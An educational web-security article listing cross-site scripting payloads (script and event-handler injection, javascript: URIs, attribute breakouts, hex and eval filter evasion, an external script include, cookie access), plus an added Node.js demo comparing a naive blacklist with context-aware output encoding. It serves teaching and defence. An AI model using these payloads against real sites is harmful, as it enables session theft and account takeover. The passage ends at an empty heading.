Crafting XSS (Cross-Site Scripting) payloads
2023-11-21 12:01:30 Author: infosecwriteups.com

Security Lit Limited

InfoSec Write-ups

Crafting XSS (Cross-Site Scripting) payloads is a significant part of learning web application security, particularly for educational and ethical hacking purposes. Here are some generic examples of XSS payloads. Each one assumes a particular injection context (HTML body, attribute value, URL, or JavaScript string), and a payload that fires in one context is usually inert in another, so match the payload to where your input is reflected. Remember, these should only be used in legal, ethical contexts, such as in a lab environment, CTF (Capture the Flag) competitions, or when you have explicit permission to test a system.

Basic Alert:

<script>alert('XSS')</script>

Document Cookie Access (cookies set with the HttpOnly flag are not exposed to script):

<script>alert(document.cookie)</script>

Image onerror Handler (needs no user interaction; fires when the invalid src fails to load):

<img src=x onerror=alert('XSS')>

Using JavaScript URI (runs only where the browser expects a URL, such as an href or src attribute):

javascript:alert('XSS')

Executing Code from External Source:

<script src="http://example.com/xss.js"></script>

HTML Injection:

<div onclick="alert('XSS')">Click me</div>

Event Handler:

<body onload=alert('XSS')>

Using SVG:

<svg/onload=alert('XSS')>

Embedding in Style Tags:

<style>@import 'javascript:alert("XSS")';</style>

This only works in legacy Internet Explorer; current browsers do not execute javascript: URLs from CSS, so treat it as a historical payload.

Using Iframe:

<iframe src="javascript:alert('XSS')"></iframe>

Non-Alpha-Non-Digit XSS (hex-escaped JavaScript):

<script>window['\x61\x6C\x65\x72\x74'](1)</script>

The \xHH escapes (\x61\x6C\x65\x72\x74 spells "alert") are decoded only inside a JavaScript string literal, which is why the name is quoted and looked up on window. The same escapes written bare, as in <script>\x3Cscript>...</script>, are a syntax error and never run.

Using document.domain:

<script>alert(document.domain)</script>

Using HTML Entities:

&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;

Mind the context: in an HTML text node the browser decodes these entities into literal text, so the line above renders as visible "<script>" and does not execute. Entity encoding helps only where the value is decoded first and then interpreted, such as a javascript: URL inside an href attribute, or when the application itself decodes the entities before writing the result into the page.

Breaking out of HTML Attributes:

"><script>alert('XSS')</script>

When this value is reflected unescaped into <input value="...">, the leading "> closes the attribute and the tag, and the resulting markup <input value=""><script>alert('XSS')</script>"> runs the script. Putting <script> inside the quotes without closing them first leaves it as inert attribute text.

Using eval():

<script>eval('al'+'ert(1)')</script>

The concatenation hides the keyword alert from filters that look for it as a literal string; eval reassembles and executes it.
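As an added example that is not part of the original article, the following Node.js script takes the payloads listed above as constructed sample input and runs them through two defences: a naive blacklist that strips <script> tags, and per-context output encoding. It shows which payloads each approach stops and why the hex-escape and HTML-entity items depend on context. The function names, the page template and the attribute-breakout strings are assumptions made for this example.

```javascript
// Added example for this article (not code from the original post).
// Function names and the page template are assumptions for the example.

// Constructed sample input: the article's payloads, plus two attribute
// breakouts written as the *injected value* (renderUnsafe supplies the tag).
const PAYLOADS = {
  basicScript: "<script>alert('XSS')</script>",
  imgOnerror: "<img src=x onerror=alert('XSS')>",
  svgOnload: "<svg/onload=alert('XSS')>",
  bodyOnload: "<body onload=alert('XSS')>",
  iframeJsUri: "<iframe src=\"javascript:alert('XSS')\"></iframe>",
  jsUri: "javascript:alert('XSS')",
  attrBreakout: "\"><script>alert('XSS')</script>",
  attrEventBreakout: "\" autofocus onfocus=alert('XSS') x=\"",
};

// Naive blacklist: removes literal <script> tags and nothing else.
function naiveFilter(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Heuristic on the final HTML: a script element, a tag carrying an on*
// handler, or an attribute whose value starts with javascript:.
function looksExecutable(html) {
  return (
    /<script/i.test(html) ||
    /<[a-z][^>]*[\s/]on[a-z]+\s*=/i.test(html) ||
    /=\s*["']?\s*javascript:/i.test(html)
  );
}

const HTML_TEXT_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encoder for an HTML text node (between tags).
function encodeForHtmlText(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_TEXT_MAP[c]);
}

// Encoder for a quoted attribute value: every non-alphanumeric becomes
// &#xHH;, so the value can neither close the quote nor add a handler.
function encodeForHtmlAttribute(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16).toUpperCase()};`);
}

// Encoder for a JavaScript string literal (\xHH / \uHHHH). This is the
// transformation behind the "non-alpha-non-digit" payload, and it only
// has meaning inside a string literal.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).toUpperCase().padStart(2, "0")}`
      : `\\u${code.toString(16).toUpperCase().padStart(4, "0")}`;
  });
}

// URL context: entity encoding does not help, because the browser decodes
// the attribute before resolving the URL, so javascript: still runs.
// Allow-list the scheme instead and fall back to a harmless "#".
function safeUrl(s) {
  return /^(https?:\/\/|\/(?!\/))/i.test(s) ? encodeForHtmlAttribute(s) : "#";
}

// A reflected value placed into three HTML contexts of a constructed page.
function renderUnsafe(value) {
  return `<p>Hello ${value}</p><input value="${value}"><a href="${value}">link</a>`;
}

function renderSafe(value) {
  return (
    `<p>Hello ${encodeForHtmlText(value)}</p>` +
    `<input value="${encodeForHtmlAttribute(value)}">` +
    `<a href="${safeUrl(value)}">link</a>`
  );
}

// JavaScript string context, var q = '<value>': the literal survives only
// if the value cannot close the quote, the script element, or the line.
function jsLiteralIntact(value, encode) {
  const body = encode ? encodeForJsString(value) : value;
  return !/['<\r\n\u2028\u2029]/.test(body);
}

function assess(name) {
  const p = PAYLOADS[name];
  return {
    naiveFilterBypassed: looksExecutable(renderUnsafe(naiveFilter(p))),
    encodedStillExecutable: looksExecutable(renderSafe(p)),
    rawJsLiteralBroken: !jsLiteralIntact(p, false),
    encodedJsLiteralBroken: !jsLiteralIntact(p, true),
  };
}

// Names of payloads that still execute after the blacklist.
function bypassingPayloads() {
  return Object.keys(PAYLOADS).filter((n) => assess(n).naiveFilterBypassed);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const name of Object.keys(PAYLOADS)) console.log(name, assess(name));
}
```

Run it with node to print a per-payload verdict. The blacklist stops only the two payloads that contain a literal <script> tag; the event-handler, SVG, iframe and javascript: variants pass straight through, while the encoded renderings never yield an executable construct, and the JavaScript-string encoder is what makes the \xHH form safe rather than dangerous.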

Breaking out of URL Parameters:


Source: https://infosecwriteups.com/crafting-xss-cross-site-scripting-payloads-919f62171bd0?source=rss----7b722bfd1b8d--bug_bounty